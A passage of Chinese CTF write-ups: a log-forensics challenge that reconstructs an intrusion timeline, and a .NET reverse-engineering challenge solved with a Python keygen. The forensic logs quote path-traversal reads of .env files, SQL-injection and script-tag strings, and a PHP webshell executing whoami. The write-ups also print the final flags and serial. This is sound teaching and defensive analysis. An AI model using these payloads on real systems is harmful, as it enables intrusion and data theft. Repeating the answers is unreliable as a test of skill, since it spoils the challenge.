\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">logs\/auth.log Linux\/auth + Web \u767b\u5f55\u5ba1\u8ba1\u7247\u6bb5<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">logs\/waf.log JSON Lines WAF \u544a\u8b66\u65e5\u5fd7<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u566a\u58f0\u5206\u79bb\">1: \u566a\u58f0\u5206\u79bb<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">WAF \u65e5\u5fd7\u4e2d\u5927\u91cf\u6765\u81ea\u4e0d\u540c IP \u7684\u91cd\u590d\u653b\u51fb\u8f7d\u8377\uff08<code>\/wp-login.php<\/code>\u3001<code>\/robots.txt<\/code>\u3001<code>\/comment?msg=&lt;script&gt;<\/code>\u3001<code>\/search?q='or'1'='1<\/code>\uff09\u5c5e\u4e8e\u81ea\u52a8\u5316\u626b\u63cf\u5668\u566a\u58f0\uff0c\u5747\u88ab block\u3002auth.log \u4e2d\u7684 SSH \u7206\u7834\u540c\u7406\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u771f\u6b63\u7ed5\u8fc7 WAF \u7684\u653b\u51fb\u6d41\u7279\u5f81\uff1aWAF action \u4e3a <code>allow<\/code>\uff08\u975e <code>block<\/code>\uff09\uff0c\u4e14 app.log \u4e2d\u51fa\u73b0\u5bf9\u5e94\u7684 <code>forensic_phase<\/code> \u548c <code>checkpoint<\/code> \u5b57\u6bb5\u3002 \u5feb\u901f\u5b9a\u4f4d\uff1a\u627e\u51fa WAF \u653e\u884c\u7684\u653b\u51fb<code>grep '\"action\":\"allow\"' logs\/waf.log<\/code> \u627e\u51fa\u5305\u542b forensic \u6807\u8bb0\u7684 app \u65e5\u5fd7<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>grep 'forensic_phase' logs\/app.log<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5173\u952e\u53d1\u73b0 \u2014 \u653b\u51fb\u8005 IP <code>203.0.113.45<\/code> \u662f\u552f\u4e00\u540c\u65f6\u51fa\u73b0\u5728 WAF allow\u3001app.log forensic \u6807\u8bb0\u3001auth.log \u767b\u5f55\u4e8b\u4ef6\u4e2d\u7684 IP\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u653b\u51fb\u94fe\u65f6\u95f4\u7ebf\u8fd8\u539f-\u6b64\u5904\u4e3a\u4e86\u65b9\u4fbf-\u7528ai\u8fdb\u884c\u65f6\u95f4\u7ebf\u6eaf\u6e90\">2: \u653b\u51fb\u94fe\u65f6\u95f4\u7ebf\u8fd8\u539f\uff08\u6b64\u5904\u4e3a\u4e86\u65b9\u4fbf\uff0c\u7528ai\u8fdb\u884c\u65f6\u95f4\u7ebf\u6eaf\u6e90\uff09<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5 <code>203.0.113.45<\/code> \u4e3a pivot\uff0c\u5173\u8054\u56db\u4efd\u65e5\u5fd7\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\n    02:13:04  \u4fa6\u67e5    GET \/.env \u2192 404                    WAF: ENUM-404-BURST\n    02:13:46  \u4fa6\u67e5    GET \/backup\/config.old \u2192 404        WAF: ENUM-404-BURST\n    02:14:40  LFI     GET \/download?file=..\/..\/..\/..\/     WAF: LFI-930100 ALLOW\n                      var\/www\/app\/.env \u2192 200              &#91;phase 1]\n    02:15:37  LFI     GET \/download?file=..\/..\/..\/..\/     WAF: LFI-930100 ALLOW\n                      var\/log\/nginx\/access.log \u2192 200      &#91;phase 2]\n    02:17:05  \u767b\u5f55    POST \/login admin \u2192 401             auth: Failed password\n                      (bad_password)\n    02:17:26  \u767b\u5f55    POST \/login admin \u2192 302           auth: Accepted web-login\n                      (remember_token \u51ed\u636e\u590d\u7528)             &#91;phase 3]\n    02:19:07  \u4e0a\u4f20    POST \/admin\/plugin\/upload           WAF: PHP-UPLOAD ALLOW\n                      q2_report.php \u2192 201                 &#91;phase 4]\n    02:19:55  RCE     GET \/uploads\/.cache\/report.php      WAF: CMD-INJECTION BLOCK\n                      ?x=whoami \u2192 200, exit_code=0         (\u6267\u884c\u5df2\u5b8c\u6210)\n    02:21:30  \u7a83\u53d6    admin_export users \u2192 87391 bytes    IP \u5207\u6362: 198.51.100.211\n                                                           &#91;phase 5]\n    02:22:46  \u5916\u4f20    backup_sync \u2192 s3:\/\/night-archive    SESSION-IP-CHANGE \u544a\u8b66\n                                                           &#91;phase 6]\n    02:23:45  \u6e05\u75d5    admin_audit_download 4312 rows      &#91;phase 7]<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u653b\u51fb\u94fe\u603b\u7ed3\uff1a \u4fa6\u67e5\u63a2\u6d4b \u2192 \u8def\u5f84\u7a7f\u8d8a\u8bfb .env \u2192 \u7a83\u53d6 remember_token \u2192 \u7ba1\u7406\u5458\u767b\u5f55 \u2192 \u4e0a\u4f20 PHP Webshell \u2192 RCE \u6267\u884c whoami \u2192 \u5207\u6362 IP \u5bfc\u51fa\u7528\u6237\u6570\u636e \u2192 \u540c\u6b65\u81f3\u653b\u51fb\u8005 S3 \u2192 \u4e0b\u8f7d\u5ba1\u8ba1\u65e5\u5fd7\u6e05\u9664\u75d5\u8ff9<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"3-flag-\u89e3\u7801\">3: Flag \u89e3\u7801<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">7 \u4e2a phase \u7684 base64 checkpoint \u6309\u5e8f\u62fc\u63a5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    import base64\n\n    checkpoints = &#91;\n        \"TEhGTEFH\",   # phase 1\n        \"e2xvZ190\",   # phase 2\n        \"aW1lbGlu\",   # phase 3\n        \"ZV9pcF9j\",   # phase 4\n        \"aGFpbl83\",   # phase 5\n        \"YzkyYTRm\",   # phase 6\n        \"MX0=\",       # phase 7\n    ]\n\n    flag = \"\".join(base64.b64decode(c).decode() for c in checkpoints)\n    print(flag)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u89e3\u7801\u8fc7\u7a0b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>Phase<\/th><th>Base64<\/th><th>Decode<\/th><\/tr><\/thead><tbody><tr><td>1<\/td><td><code>TEhGTEFH<\/code><\/td><td><code>LHFLAG<\/code><\/td><\/tr><tr><td>2<\/td><td><code>e2xvZ190<\/code><\/td><td><code>{log_t<\/code><\/td><\/tr><tr><td>3<\/td><td><code>aW1lbGlu<\/code><\/td><td><code>imelin<\/code><\/td><\/tr><tr><td>4<\/td><td><code>ZV9pcF9j<\/code><\/td><td><code>e_ip_c<\/code><\/td><\/tr><tr><td>5<\/td><td><code>aGFpbl83<\/code><\/td><td><code>hain_7<\/code><\/td><\/tr><tr><td>6<\/td><td><code>YzkyYTRm<\/code><\/td><td><code>c92a4f<\/code><\/td><\/tr><tr><td>7<\/td><td><code>MX0=<\/code><\/td><td><code>1}<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5f97\u5230flag\">\u5f97\u5230Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>LHFLAG{log_timeline_ip_chain_7c92a4f1}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"\u9006\u5411\">\u9006\u5411<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"orbitgate\">OrbitGate<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u5148\u522b\u6025\u7740 patch \u6210\u529f\u5206\u652f\u3002\u7a0b\u5e8f\u5728\u5931\u8d25\u548c\u6210\u529f\u8def\u5f84\u91cc\u90fd\u57cb\u4e86\u770b\u8d77\u6765\u50cf flag \u7684\u5b57\u7b26\u4e32\u3002<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u521d\u6b65\u5206\u6790\">\u521d\u6b65\u5206\u6790<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9898\u76ee\u76ee\u5f55\u4e2d\u6709\u4e24\u4e2a\u5173\u952e\u6587\u4ef6\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>OrbitGate.exe<\/code><\/li>\n\n\n\n<li><code>OrbitGate.zip<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u538b\u7f29\u5305\u5185\u8fd8\u6709\u9898\u9762\u548c\u63d0\u793a\uff0c\u5176\u4e2d\u6700\u5173\u952e\u7684\u4e09\u6761\u4fe1\u606f\u662f\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u4e0d\u8981\u53ea patch \u6210\u529f\u5206\u652f\u3002<\/li>\n\n\n\n<li>\u8f93\u5165\u683c\u5f0f\u56fa\u5b9a\u4e3a <code>5<\/code> \u7ec4 <code>4<\/code> \u4f4d\u5341\u516d\u8fdb\u5236\u3002<\/li>\n\n\n\n<li>\u6062\u590d\u51fa <code>5<\/code> \u4e2a <code>16-bit<\/code> \u503c\u540e\uff0c\u6700\u540e\u8fd8\u6709\u4e00\u6b65\u57fa\u4e8e\u6ce8\u518c\u7801\u7684\u89e3\u5bc6\u3002<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e09\u53e5\u5df2\u7ecf\u628a\u6574\u9053\u9898\u7684\u9aa8\u67b6\u8bb2\u900f\u4e86\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5148\u8fc7\u683c\u5f0f\u6821\u9a8c\uff1b<\/li>\n\n\n\n<li>\u518d\u8fd8\u539f 5 \u4e2a <code>UInt16<\/code> \u7684\u6570\u5b66\u5173\u7cfb\uff1b<\/li>\n\n\n\n<li>\u6700\u540e\u518d\u7528\u8fd9 5 \u4e2a\u503c\u53bb\u89e3\u5bc6\u771f\u5b9e flag\u3002<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u8bc6\u522b\u7a0b\u5e8f\u7c7b\u578b\">\u8bc6\u522b\u7a0b\u5e8f\u7c7b\u578b<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5bf9 <code>OrbitGate.exe<\/code> \u505a\u5b57\u7b26\u4e32\u63d0\u53d6\uff0c\u53ef\u4ee5\u5f88\u5feb\u770b\u5230\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    BSJB\n    v4.0.30319\n    mscorlib\n    System\n    GateChecks\n    EncryptedFlag\n    FakeTokens\n    ParseSerial\n    Verify\n    RecoverFlag<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u662f\u975e\u5e38\u6807\u51c6\u7684 .NET \u7a0b\u5e8f\u7279\u5f81\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u5c31\u662f\u8bf4\uff0c\u8fd9\u9898\u4e0d\u9700\u8981\u548c native \u58f3\u3001SEH\u3001\u53cd\u6c47\u7f16\u5bf9\u6297\u592a\u4e45\uff0c\u91cd\u70b9\u4f1a\u843d\u5728\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8bfb\u53d6\u6258\u7ba1\u5143\u6570\u636e\uff1b<\/li>\n\n\n\n<li>\u679a\u4e3e\u7c7b\u578b\u3001\u5b57\u6bb5\u3001\u65b9\u6cd5\uff1b<\/li>\n\n\n\n<li>\u8fd8\u539f <code>Verify()<\/code> \u4e0e <code>RecoverFlag()<\/code> \u7684\u903b\u8f91\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fdb\u4e00\u6b65\u53cd\u5c04\u540e\uff0c\u53ef\u4ee5\u62ff\u5230\u6838\u5fc3\u6210\u5458\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    Fields:\n    - GateChecks : UInt16&#91;]\n    - EncryptedFlag : Byte&#91;]\n    - FakeTokens : String&#91;]\n\n    Methods:\n    - LooksLikeLicense\n    - ParseSerial\n    - Verify\n    - RecoverFlag\n    - ComputeDigitChecksum\n    - Rol16\n    - Ror16<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5230\u8fd9\u91cc\uff0c\u9898\u773c\u5df2\u7ecf\u5b8c\u5168\u66b4\u9732\u51fa\u6765\u4e86\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u8bef\u5bfc\u70b9\">\u8bef\u5bfc\u70b9<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u7a0b\u5e8f\u91cc\u6709\u4e00\u4e2a\u4e13\u95e8\u7684\u5047\u7ebf\u7d22\u6570\u7ec4 <code>FakeTokens<\/code>\uff0c\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    flag{telemetry_desync_is_not_enough}\n    flag{patching_only_gets_you_a_decoy}\n    OG-LAB-REVOKED-CHANNEL<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e24\u6761 <code>flag{...}<\/code> \u90fd\u5f88\u50cf\u771f flag\uff0c\u5c24\u5176\u7b2c\u4e8c\u6761\u51e0\u4e4e\u662f\u201c\u8d34\u8138\u5632\u8bbd\u201d\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u5b83\u4eec\u6070\u597d\u4e5f\u5728\u63d0\u9192\u4f60\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u53ea\u9760 patch\uff0c\u4f1a\u62ff\u5230\u8bf1\u9975\uff1b<\/li>\n\n\n\n<li>\u53ea\u9760\u5b57\u7b26\u4e32\uff0c\u4f1a\u8d70\u8fdb\u9677\u9631\uff1b<\/li>\n\n\n\n<li>\u771f\u6b63\u7684\u51fa\u53e3\uff0c\u5728 <code>EncryptedFlag<\/code> \u548c <code>RecoverFlag()<\/code>\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e5f\u662f\u672c\u9898\u8bbe\u8ba1\u6700\u6f02\u4eae\u7684\u5730\u65b9\u3002\u5b83\u4e0d\u662f\u5355\u7eaf\u201c\u9a97\u4f60\u201d\uff0c\u800c\u662f\u5728\u7528\u8bef\u5bfc\u53cd\u5411\u5f3a\u8c03\u9898\u76ee\u4e3b\u9898\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u7a0b\u5e8f\u4e3b\u6d41\u7a0b\">\u7a0b\u5e8f\u4e3b\u6d41\u7a0b<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u6574\u4f53\u903b\u8f91\u53ef\u4ee5\u6982\u62ec\u4e3a\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u7528 <code>LooksLikeLicense()<\/code> \u68c0\u67e5\u8f93\u5165\u683c\u5f0f\uff1b<\/li>\n\n\n\n<li>\u7528 <code>ParseSerial()<\/code> \u628a\u6ce8\u518c\u7801\u62c6\u6210 5 \u4e2a <code>UInt16<\/code>\uff1b<\/li>\n\n\n\n<li>\u7528 <code>Verify(words, serial)<\/code> \u6821\u9a8c\u8fd9 5 \u4e2a\u6570\u4e4b\u95f4\u7684\u5173\u7cfb\uff1b<\/li>\n\n\n\n<li>\u5982\u679c\u901a\u8fc7\uff0c\u5219\u8c03\u7528 <code>RecoverFlag(words)<\/code> \u89e3\u5bc6 <code>EncryptedFlag<\/code>\uff1b<\/li>\n\n\n\n<li>\u8f93\u51fa\u771f\u5b9e flag\u3002<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u5176\u4e2d\u683c\u5f0f\u8981\u6c42\u975e\u5e38\u76f4\u63a5\uff1a XXXX-XXXX-XXXX-XXXX-XXXX<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6bcf\u4e00\u7ec4\u90fd\u662f 4 \u4f4d\u5341\u516d\u8fdb\u5236\uff0c\u603b\u5171 5 \u7ec4\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u6838\u5fc3\u6821\u9a8c\u903b\u8f91\">\u6838\u5fc3\u6821\u9a8c\u903b\u8f91<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9759\u6001\u5b57\u6bb5 <code>GateChecks<\/code> \u7684\u503c\u4e3a\uff1a<code>[33130, 108, 50732, 59120, 47103, 52012, 940]<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c06\u6ce8\u518c\u7801\u62c6\u6210\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>w0, w1, w2, w3, w4<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>Verify()<\/code> \u4f1a\u5148\u6784\u9020\u4e00\u4e2a 7 \u9879\u6570\u7ec4\uff0c\u518d\u4e0e <code>GateChecks<\/code> \u505a\u7ec4\u5408\u6821\u9a8c\u3002\u5173\u952e\u7ea6\u675f\u53ef\u4ee5\u8fd8\u539f\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    check0 = Rol16(w0 ^ 0x1337, 3) + 0x2222\n    check1 = w1 ^ Ror16(w0, 1) ^ 0x5AA5\n    check2 = ((w2 + Rol16(w1, 4)) &amp; 0xFFFF) ^ 0x3141\n    check3 = (w3 - w2) ^ 0xBEEF\n    check4 = Rol16(w4, 7) + (w1 ^ 0x4242)\n    check5 = w0 + w2 + w4\n    check6 = ComputeDigitChecksum(serial) + 0x6D3A<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6240\u6709\u7ed3\u679c\u90fd\u6309 <code>UInt16<\/code> \u5904\u7406\uff0c\u4e5f\u5c31\u662f\u6700\u7ec8\u53d6 <code>&amp; 0xFFFF<\/code>\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u524d\u4e94\u9879\u53ef\u4ee5\u76f4\u63a5\u53cd\u63a8\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    w0 = Ror16((GateChecks&#91;0] - 0x2222) &amp; 0xFFFF, 3) ^ 0x1337\n    w1 = GateChecks&#91;1] ^ Ror16(w0, 1) ^ 0x5AA5\n    w2 = ((GateChecks&#91;2] ^ Rol16(w1, 4)) - 0x3141) &amp; 0xFFFF\n    w3 = ((GateChecks&#91;3] ^ 0xBEEF) + w2) &amp; 0xFFFF\n    w4 = Ror16((GateChecks&#91;4] - (w1 ^ 0x4242)) &amp; 0xFFFF, 7)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7b97\u51fa\u6765\u5c31\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    w0 = 0x18DE\n    w1 = 0x56A6\n    w2 = 0x7B08\n    w3 = 0xD327\n    w4 = 0x3746<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u5c31\u662f\u5408\u6cd5\u6ce8\u518c\u7801\uff1a<code>18DE-56A6-7B08-D327-3746<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u518d\u9a8c\u8bc1\u4e00\u4e0b\uff1a<code>w0 + w2 + w4 = 0x18DE + 0x7B08 + 0x3746 = 0xCB2C<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u521a\u597d\u5bf9\u5e94\uff1a<code>GateChecks[5] = 52012 = 0xCB2C<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bf4\u660e\u53cd\u63a8\u7ed3\u679c\u5b8c\u5168\u95ed\u5408\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5173\u4e8e\u6700\u540e\u4e00\u5c42\">\u5173\u4e8e\u6700\u540e\u4e00\u5c42<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u771f\u6b63\u6709\u610f\u601d\u7684\u662f\uff0c<code>Verify()<\/code> \u901a\u8fc7\u5e76\u4e0d\u4ee3\u8868\u9898\u76ee\u7ed3\u675f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7a0b\u5e8f\u91cc\u8fd8\u6709\u4e00\u6bb5\u5b57\u8282\u6570\u7ec4\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    EncryptedFlag =\n    8E C4 C6 4D 06 92 77 48 BF 1C 1B D7 C3 85 9A 7F\n    6B E7 89 88 E7 DC 57 9D 4D 78 C9 FE 1E B8 BD 45 E9 EF 23<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u771f\u6b63\u7684 flag \u5e76\u4e0d\u5728\u5b57\u7b26\u4e32\u533a\uff0c\u800c\u662f\u5728\u8fd9\u91cc\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>RecoverFlag(words)<\/code> \u4f1a\u4f7f\u7528\u524d\u9762\u6062\u590d\u51fa\u7684 5 \u4e2a <code>UInt16<\/code> \u503c\uff0c\u6784\u9020\u4e00\u6761\u4e0e\u6ce8\u518c\u7801\u7ed1\u5b9a\u7684\u5b57\u8282\u6d41\uff0c\u5bf9 <code>EncryptedFlag<\/code> \u505a\u9010\u5b57\u8282\u89e3\u5bc6\uff0c\u6700\u540e\u518d\u6309 ASCII \u8f93\u51fa\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u5c31\u89e3\u91ca\u4e86\u4e3a\u4ec0\u4e48\u5355\u7eaf patch \u6210\u529f\u5206\u652f\u4e0d\u591f\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4f60\u53ef\u4ee5\u8ba9\u7a0b\u5e8f\u201c\u663e\u793a\u6210\u529f\u201d\uff1b<\/li>\n\n\n\n<li>\u4f46\u5982\u679c\u6ce8\u518c\u7801\u4e0d\u5408\u6cd5\uff0c\u771f\u6b63\u7684\u89e3\u5bc6\u8fc7\u7a0b\u5c31\u6ca1\u6709\u6b63\u786e\u8f93\u5165\uff1b<\/li>\n\n\n\n<li>\u6700\u7ec8\u62ff\u4e0d\u5230\u771f flag\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e00\u6b65\u628a\u201c\u5f62\u5f0f\u4e0a\u7684\u901a\u8fc7\u201d\u548c\u201c\u903b\u8f91\u4e0a\u7684\u901a\u8fc7\u201d\u5f7b\u5e95\u533a\u5206\u5f00\u4e86\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u6c42\u89e3\u811a\u672c\">\u6c42\u89e3\u811a\u672c<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e0b\u9762\u7ed9\u51fa\u4e00\u4e2a\u8db3\u591f\u7b80\u6d01\u3001\u9002\u5408\u6bd4\u8d5b\u73b0\u573a\u590d\u73b0\u7684 Python \u7248\u672c\u6c42\u89e3\u811a\u672c\u3002\u5b83\u76f4\u63a5\u6839\u636e <code>GateChecks<\/code> \u53cd\u63a8 5 \u4e2a <code>16-bit<\/code> \u503c\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    def rol16(x, s):\n        s &amp;= 15\n        return ((x &lt;&lt; s) | (x &gt;&gt; (16 - s))) &amp; 0xFFFF\n    def ror16(x, s):\n        s &amp;= 15\n        return ((x &gt;&gt; s) | (x &lt;&lt; (16 - s))) &amp; 0xFFFF\n\n\n    gate = &#91;33130, 108, 50732, 59120, 47103, 52012, 940]\n\n    w0 = ror16((gate&#91;0] - 0x2222) &amp; 0xFFFF, 3) ^ 0x1337\n    w1 = gate&#91;1] ^ ror16(w0, 1) ^ 0x5AA5\n    w2 = ((gate&#91;2] ^ rol16(w1, 4)) - 0x3141) &amp; 0xFFFF\n    w3 = ((gate&#91;3] ^ 0xBEEF) + w2) &amp; 0xFFFF\n    w4 = ror16((gate&#91;4] - (w1 ^ 0x4242)) &amp; 0xFFFF, 7)\n\n    serial = f\"{w0:04X}-{w1:04X}-{w2:04X}-{w3:04X}-{w4:04X}\"\n    print(serial)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8f93\u51fa\uff1a <code>18DE-56A6-7B08-D327-3746<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c06\u8be5\u5b57\u7b26\u4e32\u8f93\u5165\u7a0b\u5e8f\uff0c\u5373\u53ef\u5f97\u5230\u771f\u5b9e flag\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u8fd0\u884c\u7ed3\u679c\">\u8fd0\u884c\u7ed3\u679c<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u7a0b\u5e8f\u63a5\u53d7\u6b63\u786e\u6ce8\u518c\u7801\u540e\u7684\u8f93\u51fa\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    &#91;+] Uplink accepted.\n    &#91;+] Orbital maintenance channel restored.\n    &#91;+] flag{4c731fc9bdfd9b15_orbit_unlock}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u6b64\u6700\u7ec8\u7b54\u6848\u4e3a\uff1a<code>flag{4c731fc9bdfd9b15_orbit_unlock}<\/code><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u590d\u76d8\">\u590d\u76d8<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u7684\u96be\u70b9\u4ece\u6765\u4e0d\u5728\u201c\u7b97\u672f\u6709\u591a\u96be\u201d\uff0c\u800c\u5728\u201c\u4f60\u662f\u5426\u613f\u610f\u5c0a\u91cd\u7a0b\u5e8f\u672c\u8eab\u7684\u903b\u8f91\u201d\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u53ea\u60f3\u8d70\u6377\u5f84\uff0c\u5f88\u5bb9\u6613\u505c\u5728\u4e0b\u9762\u8fd9\u4e9b\u5047\u7ec8\u70b9\u4e0a\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u770b\u5230 <code>flag{...}<\/code> \u5b57\u7b26\u4e32\u5c31\u63d0\u4ea4\uff1b<\/li>\n\n\n\n<li>patch \u6761\u4ef6\u8df3\u8f6c\u8ba9\u7a0b\u5e8f\u663e\u793a\u6210\u529f\uff1b<\/li>\n\n\n\n<li>\u53ea\u6062\u590d\u524d\u534a\u6bb5\u7ea6\u675f\uff0c\u4e0d\u53bb\u770b\u6700\u540e\u7684\u89e3\u5bc6\u6d41\u7a0b\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u8fd9\u9898\u771f\u6b63\u8003\u5bdf\u7684\u662f\u53e6\u4e00\u4ef6\u4e8b\uff1a<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">Reverse \u4e0d\u662f\u628a\u7a0b\u5e8f\u6539\u6210\u4f60\u60f3\u770b\u5230\u7684\u6837\u5b50\u3002Reverse \u662f\u7406\u89e3\u5b83\u4e3a\u4ec0\u4e48\u4f1a\u53d8\u6210\u90a3\u4e2a\u6837\u5b50\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ece\u8fd9\u4e2a\u89d2\u5ea6\u8bf4\uff0c<code>OrbitGate<\/code> \u662f\u4e00\u9053\u5b8c\u6210\u5ea6\u5f88\u9ad8\u7684\u9898\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7ed3\u6784\u77ed\u5c0f\uff1b<\/li>\n\n\n\n<li>\u63d0\u793a\u660e\u786e\uff1b<\/li>\n\n\n\n<li>\u8bef\u5bfc\u6709\u6548\u4f46\u4e0d\u8fc7\u5206\uff1b<\/li>\n\n\n\n<li>\u89e3\u9898\u8def\u5f84\u5e72\u51c0\uff1b<\/li>\n\n\n\n<li>\u4e3b\u9898\u8868\u8fbe\u5b8c\u6574\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b83\u544a\u8bc9\u6211\u4eec\uff0c\u771f\u6b63\u7684\u201c\u901a\u8fc7\u9a8c\u8bc1\u201d\uff0c\u4e0d\u662f\u4f2a\u9020\u6210\u529f\u5206\u652f\uff0c\u800c\u662f\u6784\u9020\u51fa\u4e00\u628a\u80fd\u8ba9\u6574\u4e2a\u7cfb\u7edf\u81ea\u7136\u8fd0\u8f6c\u7684\u94a5\u5319\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u628a\u94a5\u5319\u5c31\u662f\uff1a 18DE-56A6-7B08-D327-3746<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u6700\u7ec8\u7ed3\u8bba\">\u6700\u7ec8\u7ed3\u8bba<\/h4>\n\n\n\n<p 